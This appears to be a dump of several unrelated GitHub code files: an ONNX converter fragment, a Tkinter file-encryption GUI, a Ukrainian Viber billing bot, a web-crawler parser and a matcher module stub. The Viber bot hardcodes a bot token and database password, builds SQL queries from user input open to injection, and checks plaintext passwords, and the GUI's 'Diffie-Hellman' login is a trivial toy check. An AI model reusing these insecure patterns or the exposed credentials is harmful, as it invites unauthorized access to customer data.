avg_var=constants[var],\n gamma=constants[gamma],\n beta=constants[beta],\n )\n ]\n","repo_name":"lflyme/nnoir","sub_path":"nnoir-onnx/nnoir_onnx/operators/batch_normalization.py","file_name":"batch_normalization.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"43078330119","text":"import Tkinter,sys\r\nfrom Tkinter import *\r\nimport tkFileDialog\r\nimport os\r\nfrom splifile import FileSplitter, FileSplitterException, mainp\r\nfrom encryptdir import encrypt_file, decrypt_file, renamefiles, main\r\n\r\n\r\n\r\ndef proceed():\r\n\t\tn=Tkinter.Tk()\r\n\t\tdef server():\r\n\t\t\t#global n\r\n\t\t\tpth=n.directory\r\n\t\t\tkeyw=pwd.get()\r\n\t\t\tdef splitter0():\r\n\t\t\t\tos.chdir(pth)\r\n\t\t\t\tn1=numc.get()\r\n\t\t\t\tn2=int(n1)\r\n\t\t\t\ta=0\r\n\t\t\t\tdirs=os.listdir(pth)\r\n\t\t\t\tfor fn in dirs:\r\n\t\t\t\t\tprint(fn)\r\n\t\t\t\t\tmainp(fn,n2,a)\r\n\t\t\tdef encrypter0():\r\n\t\t\t\ta=0\r\n\t\t\t\tmain(keyw,pth,a)\r\n\t\t\tif __name__==\"__main__\" :\r\n\t\t\t\tsplitter0()\r\n\t\t\t\tencrypter0()\r\n\t\t\r\n\t\tdef client():\r\n\t\t\t#global n\r\n\t\t\tpth=n.directory\r\n\t\t\tkeyw=pwd.get()\r\n\t\t\tdef splitter1():\r\n\t\t\t\tos.chdir(pth)\r\n\t\t\t\tn1=numc.get()\r\n\t\t\t\tn2=int(n1)\r\n\t\t\t\ta=1\r\n\t\t\t\tdirs=os.listdir(pth)\r\n\t\t\t\tfor fn in dirs:\r\n\t\t\t\t\tprint(fn)\r\n\t\t\t\t\tmainp(fn,n2,a)\r\n\t\t\tdef encrypter1():\r\n\t\t\t\ta=1\r\n\t\t\t\tmain(keyw,pth,a)\r\n\t\t\tif __name__==\"__main__\" :\r\n\t\t\t\tencrypter1()\r\n\t\t\t\tsplitter1()\r\n\t\r\n\t\ttitl=Label(n, text='\t\t\tParCrypt\t\t').grid(row=0)\r\n\t\tl9=Label(n, text='').grid(row=1)\r\n\t\tl8=Label(n, text='Key : ').grid(row=2,column=0)\r\n\t\tpwd=Entry(n)\r\n\t\tpwd.grid(row=2, column=1)\r\n\t\tn.directory=tkFileDialog.askdirectory()\r\n\t\tb1=Button(n, text =\"Encrypt\", command=server)\r\n\t\tb1.grid(row=5,column=0)\r\n\t\tb2=Button(n, text =\"Decrypt\", command = 
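# The epsilon lookup in OpBatchNormalization above, as a reusable sketch
# (hypothetical helper): scan the node's attributes for a float by name and
# fall back to a default -- 1e-05 is the default epsilon in the ONNX
# BatchNormalization spec.
def get_float_attr(node, name, default):
    for attr in node.attribute:
        if attr.name == name:
            return attr.f
    return default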
client)\r\n\t\tb2.grid(row=5,column=1)\r\n\t\tl6=Label(n, text='Chunks : ').grid(row=3, column=0)\r\n\t\tnumc=Entry(n)\r\n\t\tnumc.grid(row=3,column=1)\r\n\t\tl7=Label(n, text='').grid(row=4)\r\n\r\n\r\n\r\ndef diffiehellman():\r\n\tglobal m\r\n\tp=23\r\n\tG=18\r\n\ta1=puk.get()\r\n\tb1=prk.get()\r\n\ta=int(a1)\r\n\tb=int(b1)\r\n\tA=(a**b)%p\r\n\tif(A==G):\r\n\t\tx=Label(m, text=\"Authenticated\").grid(row=6)\r\n\t\tproceed()\r\n\telse:\r\n\t\tx=Label(m, text=\"Authentication Failed\").grid(row=6)\r\n\t\tm.quit()\r\n\r\nm=Tkinter.Tk()\r\nt=Label(m, text='\t\t\tParCrypt\t\t').grid(row=0)\r\nl=Label(m, text='').grid(row=1)\r\nh1=Label(m, text='Public Key : ').grid(row=2)\r\nh2=Label(m, text='Private Key : ').grid(row=3)\r\npuk=Entry(m)\r\npuk.grid(row=2, column=1)\r\nprk=Entry(m)\r\nprk.grid(row=3, column=1)\r\nB=Button(m, text =\"Verify\", command = diffiehellman)\r\nB.grid(row=5)\r\nm.mainloop()\r\n\r\n\r\n\r\n\r\n\t\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Aviral18/ParCrypt","sub_path":"mainrun.py","file_name":"mainrun.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74888174133","text":"from viberbot.api.viber_requests import ViberUnsubscribedRequest\r\n\r\nfrom flask import Flask, request, Response\r\nfrom viberbot import Api\r\nfrom viberbot.api.bot_configuration import BotConfiguration\r\nfrom viberbot.api.messages.text_message import TextMessage\r\nfrom viberbot.api.messages.keyboard_message import KeyboardMessage\r\nfrom viberbot.api.viber_requests import ViberFailedRequest, ViberConversationStartedRequest\r\nfrom viberbot.api.viber_requests import ViberMessageRequest\r\nfrom viberbot.api.viber_requests import ViberSubscribedRequest\r\n\r\nimport os\r\nimport random\r\nimport time\r\nimport logging\r\nimport sched\r\nimport threading\r\nimport pymysql\r\n\r\nPAYMENT = dict()\r\nPAYMENT['transaction_id'] = 0\r\nPAYMENT['transaction_type'] = 'defrayal'\r\nPAYMENT['transaction_amount'] = 0\r\n# Словарь сессии\r\nSESSION = dict()\r\nSESSION['is_auth'] = False\r\nSESSION['client_id'] = '000000000'\r\nSESSION['client_contract'] = '00/00/00'\r\nSESSION['client_compani'] = '0'\r\nSESSION['client_debt'] = 0\r\nSESSION['client_tariff'] = 0\r\nSESSION['client_recommended_payment'] = SESSION['client_debt'] + SESSION['client_tariff']\r\nSESSION['client_for_year_payment'] = SESSION['client_tariff'] * 0.9\r\n\r\noperators = []\r\noperator = {'chat_id': None, 'name': None, 'work': None}\r\n\r\nsmm = []\r\n\r\npassword = None\r\n\r\nlogger = logging.getLogger()\r\nlogger.setLevel(logging.DEBUG)\r\n\r\nhandler = logging.StreamHandler()\r\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\nhandler.setFormatter(formatter)\r\n\r\nlogger.addHandler(handler)\r\n\r\nkeyboard = \\\r\n {\r\n \"DefaultHeight\": True,\r\n \"BgColor\": \"#c3c3c3\",\r\n \"Type\": \"keyboard\",\r\n \"Buttons\": [\r\n {\r\n \"Columns\": 6,\r\n \"Rows\": 1,\r\n \"Text\": \"Увійти\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Увійти\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Графік роботи\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Графік роботи\",\r\n \"ReplyType\": \"message\"\r\n },\r\n\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Соц мережі\",\r\n \"BgColor\": \"#000000\",\r\n 
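# Note: the verification above is a toy shared-secret check rather than a real
# Diffie-Hellman exchange, and (a ** b) % p materializes the full integer power
# before reducing. Python's three-argument pow does square-and-multiply modular
# exponentiation and stays fast even for very large exponents:
p = 23
assert pow(18, 5, p) == (18 ** 5) % p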
\"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Соц мережі\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 6,\r\n \"Rows\": 1,\r\n \"Text\": \"Контакти\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Контакти\",\r\n \"ReplyType\": \"message\"\r\n }\r\n ]\r\n }\r\n\r\nsmm_keyboard = \\\r\n {\r\n \"DefaultHeight\": True,\r\n \"BgColor\": \"#c3c3c3\",\r\n \"Type\": \"keyboard\",\r\n \"Buttons\": [\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Стан рахунку\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Стан рахунку\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Перейти до оплати\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Перейти до оплати\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 6,\r\n \"Rows\": 1,\r\n \"Text\": \"Інформація по рахунку\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Інформація по рахунку\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Наші реквізити\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Наші реквізити\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Фінансова історія\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Фінансова історія\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Соц мережі\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Соц мережі\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Графік роботи\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Графік роботи\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 6,\r\n \"Rows\": 1,\r\n \"Text\": \"Контакти\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Контакти\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 6,\r\n \"Rows\": 1,\r\n \"Text\": \"Вийти...\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Вийти...\",\r\n \"ReplyType\": \"message\"\r\n }\r\n ]\r\n }\r\nport = int(os.environ.get('PORT', 5000))\r\n\r\napp = Flask(__name__)\r\nviber = Api(BotConfiguration(\r\n name='PRIMESECURITYBOT',\r\n avatar='http://viber.com/avatar.jpg',\r\n auth_token='4c620ba834000fe9-3e3fd4704ca10b76-4f4b031a6097aa0b'\r\n))\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef incoming():\r\n logger.debug(\"received request. 
post data: {0}\".format(request.get_data()))\r\n viber_request = viber.parse_request(request.get_data())\r\n\r\n if isinstance(viber_request, ViberMessageRequest):\r\n global temp_password\r\n global temp_chat_id\r\n message = viber_request.message\r\n\r\n if message.text == 'Увійти':\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Введіть, будь ласка, свій особовий рахунок')])\r\n\r\n elif len(message.text) == 9:\r\n def password_saving(client_id):\r\n viber.send_messages(viber_request.sender.id,\r\n [TextMessage(text='Введіть, будь ласка, свій пароль')])\r\n link = pymysql.connect('prime00.mysql.tools', 'prime00_clients', '8y&@40oInG', 'prime00_clients')\r\n cursor = link.cursor()\r\n password_query = \"\"\"SELECT user_password FROM users WHERE user_id='\"\"\" + client_id + \"\"\"'\"\"\"\r\n cursor.execute(password_query)\r\n password = cursor.fetchone()\r\n link.commit()\r\n return password\r\n\r\n SESSION['client_id'] = message.text\r\n temp_password = password_saving(message.text)\r\n elif len(message.text) == 5:\r\n str_correct_password = str(temp_password)\r\n maybe_password = \"('\" + message.text + \"',)\"\r\n if str_correct_password == maybe_password:\r\n temp_chat_id = viber_request.sender.id\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Вітаємо в персональному кабінеті! Ви успішно залоговані.',\r\n keyboard=smm_keyboard)])\r\n\r\n def client_contract_extracting(client_id):\r\n link = pymysql.connect('prime00.mysql.tools', 'prime00_clients', '8y&@40oInG', 'prime00_clients')\r\n cursor = link.cursor()\r\n client_contract_query = \"\"\"SELECT user_contract_num FROM users WHERE user_id='\"\"\" + client_id + \"\"\"'\"\"\"\r\n cursor.execute(client_contract_query)\r\n contract = cursor.fetchone()\r\n return contract\r\n\r\n def client_compani(client_id):\r\n link = pymysql.connect('prime00.mysql.tools', 'prime00_clients', '8y&@40oInG', 'prime00_clients')\r\n cursor = link.cursor()\r\n client_compani = \"\"\"SELECT user_compani FROM users WHERE user_id='\"\"\" + client_id + \"\"\"'\"\"\"\r\n cursor.execute(client_compani)\r\n compani = cursor.fetchone()\r\n return compani\r\n\r\n def client_tariff_extracting(client_id):\r\n link = pymysql.connect('prime00.mysql.tools', 'prime00_clients', '8y&@40oInG', 'prime00_clients')\r\n cur = link.cursor()\r\n client_contract_query = \"\"\"SELECT user_tax FROM users WHERE user_id='\"\"\" + client_id + \"\"\"'\"\"\"\r\n cur.execute(client_contract_query)\r\n tariff = cur.fetchone()\r\n return tariff[0]\r\n\r\n def client_debt_extracting(client_id):\r\n link = pymysql.connect('prime00.mysql.tools', 'prime00_clients', '8y&@40oInG', 'prime00_clients')\r\n cur = link.cursor()\r\n client_rev_query = \"\"\"SELECT SUM(transaction_sum) FROM payment_story WHERE transaction_client='\"\"\" + client_id + \"\"\"'\"\"\"\r\n cur.execute(client_rev_query)\r\n rev = cur.fetchone()\r\n client_debt_at_the_start_query = \"\"\"SELECT user_balance FROM users WHERE user_id='\"\"\" + client_id + \"\"\"'\"\"\"\r\n cur.execute(client_debt_at_the_start_query)\r\n debt_at_the_start = cur.fetchone()\r\n if rev[0]:\r\n result_sum = debt_at_the_start[0] + rev[0]\r\n else:\r\n result_sum = debt_at_the_start[0] + 0\r\n return result_sum\r\n\r\n SESSION['is_auth'] = True\r\n SESSION['client_compani'] = client_compani(SESSION['client_id'])\r\n print(SESSION['client_compani'])\r\n SESSION['client_contract'] = client_contract_extracting(SESSION['client_id'])\r\n SESSION['client_tariff'] = client_tariff_extracting(SESSION['client_id'])\r\n 
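# The queries above splice client_id straight into the SQL text (injection-
# and quoting-prone), and the password check later compares str(fetchone())
# -- the repr of a tuple -- against a hand-built "('...',)" string. A
# parameterized sketch (host/user/password are placeholders, not the real
# credentials):
def fetch_password(client_id):
    link = pymysql.connect(host="db.example.com", user="bot", password="...", database="clients")
    with link.cursor() as cur:
        cur.execute("SELECT user_password FROM users WHERE user_id=%s", (client_id,))
        row = cur.fetchone()
    link.close()
    return row[0] if row else None  # compare this value directly to the input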
SESSION['client_debt'] = client_debt_extracting(SESSION['client_id'])\r\n SESSION['client_recommended_payment'] = SESSION['client_debt'] + SESSION['client_tariff']\r\n SESSION['client_for_year_payment'] = float(SESSION['client_tariff']) * 12 * 0.9\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='В меню ви можете знайти доступні операції та здійснити оплату',\r\n keyboard=smm_keyboard)])\r\n\r\n elif str_correct_password != maybe_password:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Введені дані некоректні! Перевірте пароль та спробуйте ще раз.', keyboard=keyboard)])\r\n\r\n elif len(message.text) != 5:\r\n viber.send_messages(viber_request.sender.id, [\r\n TextMessage(text='Введені дані некоректні! Спробуйте ще раз.',\r\n keyboard=keyboard)])\r\n\r\n\r\n elif message.text == 'Вийти...' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [\r\n TextMessage(text='Ви успішно вийшли з персонального кабінету!', keyboard=keyboard)])\r\n\r\n SESSION['is_auth'] = False\r\n SESSION['client_id'] = None\r\n SESSION['client_contract'] = None\r\n SESSION['client_debt'] = None\r\n SESSION['client_tariff'] = None\r\n SESSION['client_recommended_payment'] = None\r\n SESSION['client_for_year_payment'] = None\r\n\r\n elif message.text == 'Стан рахунку' and SESSION['is_auth']:\r\n if SESSION['client_debt'] > 0:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text=\"\"\"Ваша заборгованість: \"\"\" + str(\r\n SESSION['client_debt']) + \"\"\" гривень. \\nБудь ласка, сплатіть її до 10 числа поточного місяця.\"\"\", keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [\r\n TextMessage(text='Рекомендований платіж: ' + str(SESSION['client_recommended_payment']) + ' гривень', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [\r\n TextMessage(text='Разовий платіж за рік: ' + str(SESSION['client_for_year_payment']) + ' гривень',\r\n keyboard=smm_keyboard)])\r\n else:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(\r\n text='Шановний клієнте, у вас відсутня заборгованість! ' + 'Ваш авансовий платіж: ' + str(\r\n SESSION['client_debt']).replace('-', '+') + ' гривень. \\nДякуємо, що вчасно сплачуєте рахунки!', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [\r\n TextMessage(text='Разовий платіж за рік: ' + str(SESSION['client_for_year_payment']) + ' гривень',\r\n keyboard=smm_keyboard)])\r\n\r\n elif message.text == 'Інформація по рахунку' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id,\r\n [TextMessage(text='Ваш особовий рахунок: ' + str(SESSION['client_id']), keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(\r\n text='Ваш номер договору: ' + str(SESSION['client_contract']).replace('(', '').replace(\"'\", '').replace(\r\n ',',\r\n '').replace(\r\n ')', ''), keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [\r\n TextMessage(text='Сума щомісячного платежу: ' + str(SESSION['client_tariff']) + ' гривень',\r\n keyboard=smm_keyboard)])\r\n \r\n elif str(SESSION['client_compani']).replace('(', '').replace(\"'\", '').replace(\r\n ',',\r\n '').replace(\r\n ')', '') == '1' and message.text == 'Наші реквізити':\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text=\r\n'''ТОВ «ПРАЙМ-СЕКЬЮРІТІ-1»\r\nЮридична адреса: 08130, Київська область, Києво-Святошинський район, село Петропавлівська Борщагівка, вул. Миру, 11, оф. 
150\r\nп/р UA513348510000000026004112772\r\nв АТ «ПУМБ», МФО 334851\r\nКод ЄДРПОУ 43587382\r\nТел: +38 067 400 83 70 \r\nПошта: manager@prime.net.ua''', keyboard=smm_keyboard)])\r\n elif str(SESSION['client_compani']).replace('(', '').replace(\"'\", '').replace(\r\n ',',\r\n '').replace(\r\n ')', '') == '2' and message.text == 'Наші реквізити':\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text=\r\n'''ТОВ «ПРАЙМ-СЕКЬЮРІТІ-2»\r\nЮридична адреса: 08130, Київська область, Києво-Святошинський район, село Петропавлівська Борщагівка, вул. Миру, 11, оф. 150\r\nп/р UA063348510000000026000132217\r\nв АТ «ПУМБ» МФО 334851\r\nКод ЄДРПОУ 44135940\r\nТел: +38 067 400 83 70 \r\nПошта: manager@prime.net.ua''', keyboard=smm_keyboard)])\r\n elif message.text == 'Фінансова історія' and SESSION['is_auth']:\r\n def payment_extracting(client_id):\r\n link = pymysql.connect('prime00.mysql.tools', 'prime00_clients', '8y&@40oInG', 'prime00_clients')\r\n cur = link.cursor()\r\n query_4_countcheck = \"SELECT transaction_id FROM payment_story WHERE transaction_client='\" + client_id + \"'ORDER BY transaction_id DESC LIMIT 10\"\r\n cur.execute(query_4_countcheck)\r\n countcheck = cur.fetchall()\r\n cur = link.cursor()\r\n query_id = \"SELECT transaction_id FROM payment_story WHERE transaction_client='\" + client_id + \"' ORDER BY transaction_id DESC\"\r\n cur.execute(query_id)\r\n payment_ids = cur.fetchall()\r\n query_datetime = \"SELECT transaction_datetime FROM payment_story WHERE transaction_client='\" + client_id + \"'ORDER BY transaction_id DESC\"\r\n cur.execute(query_datetime)\r\n payment_datetimes = cur.fetchall()\r\n query_type = \"SELECT transaction_type FROM payment_story WHERE transaction_client='\" + client_id + \"'ORDER BY transaction_id DESC\"\r\n cur.execute(query_type)\r\n payment_types = cur.fetchall()\r\n query_sum = \"SELECT transaction_sum FROM payment_story WHERE transaction_client='\" + client_id + \"'ORDER BY transaction_id DESC\"\r\n cur.execute(query_sum)\r\n payment_sums = cur.fetchall()\r\n i = 0\r\n while i < len(countcheck):\r\n viber.send_messages(viber_request.sender.id, [TextMessage(\r\n text='id: ' + str(payment_ids[i]).replace('(', '').replace(',', '').replace(')', '') + ''', \r\n дата: ''' + str(payment_datetimes[i]).replace('(', '').replace(',', '').replace(')', '').replace('d',\r\n '').replace(\r\n 'a', '').replace('t', '').replace('e', '').replace('i', '').replace('m', '').replace(\r\n '.', '').replace(' ', '-').replace('-0-0', '') + ''',\r\n тип транзакції: ''' + str(payment_types[i]).replace('(', '').replace(',', '').replace(')', '').replace(\"'\",\r\n '').replace(\r\n 'nachislenie', 'нарахування').replace('oplata schota', 'оплата') + ''', \r\n сума: ''' + str(payment_sums[i]).replace('D', '').replace('e', '').replace('c', '').replace('i',\r\n '').replace('m',\r\n '').replace(\r\n 'a', '').replace('l', '').replace('(', '').replace(\"'\", '').replace(')', '').replace(\r\n ',', '') + ' гривень', keyboard=smm_keyboard)])\r\n i = i + 1\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Останні транзакції:', keyboard=smm_keyboard)])\r\n payment_extracting(SESSION['client_id'])\r\n elif message.text == 'Соц мережі' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Facebook PrimeSecurity: https://www.facebook.com/prime.securiity/', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Facebook Игорь Лаптев: https://www.facebook.com/imlaptev', keyboard=smm_keyboard)])\r\n 
viber.send_messages(viber_request.sender.id, [TextMessage(text='Instagram PrimeSecurity: https://instagram.com/prime_security_ua?igshid=27lla3fgykge', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Instagram Игорь Лаптев: https://instagram.com/imlaptev?igshid=ha5gbfpp18vo', keyboard=smm_keyboard)])\r\n elif message.text == 'Соц мережі' and message.text != SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Facebook PrimeSecurity: https://www.facebook.com/prime.securiity/', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Facebook Игорь Лаптев: https://www.facebook.com/imlaptev', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Instagram PrimeSecurity: https://instagram.com/prime_security_ua?igshid=27lla3fgykge', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Instagram Игорь Лаптев: https://instagram.com/imlaptev?igshid=ha5gbfpp18vo', keyboard=keyboard)])\r\n\r\n elif message.text == 'Контакти' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Бухгалтерія: 067-400-83-70', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Гаряча лінія: 067-323-80-08', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Пошта: manager@prime.net.ua', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Наш сайт: https://www.prime.net.ua/', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='с. Петропавлівська Борщагівка ЖК «Львівський», вул. Миру 11 буд. 11 офіс 150', keyboard=smm_keyboard)])\r\n elif message.text == 'Контакти' and message.text != SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Бухгалтерія: 067-400-83-70', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Гаряча лінія: 067-323-80-08', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Пошта: manager@prime.net.ua', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Наш сайт: https://www.prime.net.ua/', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='с. Петропавлівська Борщагівка ЖК «Львівський», вул. Миру 11 буд. 
11 офіс 150', keyboard=keyboard)])\r\n\r\n elif message.text == 'Графік роботи' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='''Понеділок: 09:00-18:00\r\nВівторок: 09:00-18:00\r\nСереда: 09:00-18:00\r\nЧетвер: 09:00-18:00\r\nП'ятниця: 09:00-18:00\r\nСубота: вихідний\r\nНеділя: вихідний\r\n13:00-14:00 - обід''', keyboard=smm_keyboard)])\r\n elif message.text == 'Графік роботи' and message.text != SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='''Понеділок: 09:00-18:00\r\nВівторок: 09:00-18:00\r\nСереда: 09:00-18:00\r\nЧетвер: 09:00-18:00\r\nП'ятниця: 09:00-18:00\r\nСубота: вихідний\r\nНеділя: вихідний\r\n13:00-14:00 - обід''', keyboard=keyboard)])\r\n\r\n elif message.text == 'Перейти до оплати' and str(SESSION['client_compani']).replace('(', '').replace(\"'\", '').replace(\r\n ',',\r\n '').replace(\r\n ')', '') == '1' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Портмоне: portmone.com.ua/r3/ru/terminal/index/index/id/28649', keyboard=smm_keyboard)])\r\n elif message.text == 'Перейти до оплати' and str(SESSION['client_compani']).replace('(', '').replace(\"'\", '').replace(\r\n ',',\r\n '').replace(\r\n ')', '') == '2' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Портмоне: portmone.com.ua/r3/oplata-ohrany-prime-security-kievskaya-oblast', keyboard=smm_keyboard)])\r\n\r\n elif isinstance(viber_request, ViberConversationStartedRequest):\r\n viber.send_messages(viber_request.user.id, [TextMessage(text=\"Вітаємо! Натисніть на кнопку для того, щоб увійти в персональний кабінет клієнта.\", keyboard=keyboard)])\r\n\r\n elif isinstance(viber_request, ViberFailedRequest):\r\n logger.warn(\"client failed receiving message. failure: {0}\".format(viber_request), keyboard=keyboard)\r\n\r\n return Response(status=200)\r\n\r\n\r\ndef set_webhook(vib):\r\n viber.unset_webhook()\r\n time.sleep(1)\r\n viber.set_webhook(f'https://serene-river-66909.herokuapp.com/')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n scheduler = sched.scheduler(time.time, time.sleep)\r\n scheduler.enter(5, 1, set_webhook, (viber,))\r\n t = threading.Thread(target=scheduler.run)\r\n t.start()\r\n\r\n app.run(host='0.0.0.0', port=port, debug=True)\r\n","repo_name":"chernysh2909/PrimeViberBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26969,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38882726357","text":"# coding=utf-8\nimport urlparse\n\nfrom bs4 import BeautifulSoup\nfrom Util import Matcher\n\nmatcher = Matcher.Matcher()\n\n\nclass HtmlParser(object):\n def getNewUrls(self, newUrl, soup):\n newUrls = set()\n links = soup.find_all('a', href=matcher.getPattern('appLink'))\n for link in links:\n url = link['href']\n newFullUrl = urlparse.urljoin(newUrl, url)\n newUrls.add(newFullUrl)\n return newUrls\n\n def getNewData(self, newUrl, soup):\n newData = dict()\n newData['url'] = newUrl\n if matcher.getPattern('appLink').search(newUrl):\n try:\n # 如果正在爬取的页面是app页面\n '''\n AppZapp - 8bitWar: Apokalyps\n '''\n nameNode = soup.find('title')\n newData['name'] = nameNode.get_text()\n '''\n
<div id=\"PortalClicks\"><b>7 Hits </b></div>
\n '''\n hitNode = soup.find('div', id=\"PortalClicks\").find('b')\n '''\n
<div id=\"AppDetailLikes\">Likes <b>0</b></div>
\n '''\n likeNode = soup.find('div', id=\"AppDetailLikes\").find('b')\n newData['hits'] = hitNode.get_text()\n newData['likes'] = likeNode.get_text()\n return newData\n except:\n return\n else:\n # 如果正在爬取的页面是目录页面\n return None\n\n def getNewAppUrls(self, soup):\n newUrls = set()\n links = soup.find_all('a', href=matcher.getPattern('appLink'))\n for link in links:\n url = link['href']\n newFullUrl = urlparse.urljoin('http://www.appzapp.us', url)\n newUrls.add(newFullUrl)\n return newUrls\n\n def parse(self, newUrl, htmlContent):\n if newUrl is None or htmlContent is None:\n return\n soup = BeautifulSoup(htmlContent, 'html.parser')\n newUrls = self.getNewUrls(newUrl, soup)\n newData = self.getNewData(newUrl, soup)\n return newUrls, newData\n\n def pageParse(self, driver):\n if driver is None:\n return\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n newAppUrls = self.getNewAppUrls(soup)\n return newAppUrls\n","repo_name":"ZyzyPeter/AppCrawler-Analysis","sub_path":"WebCrawler/Service/Html_Parser.py","file_name":"Html_Parser.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5911778514","text":"import re\nimport sys\nfrom abc import ABC, abstractmethod\nfrom datetime import datetime, timedelta, timezone\nfrom enum import Enum\nfrom itertools import product\nfrom typing import Any, Dict, List, Optional\n\nfrom synth_tools import log\nfrom synth_tools.utils import fail\n\n\nclass Matcher(ABC):\n SPECIAL = {\n \"all\": \"AllMatcher\",\n \"any\": 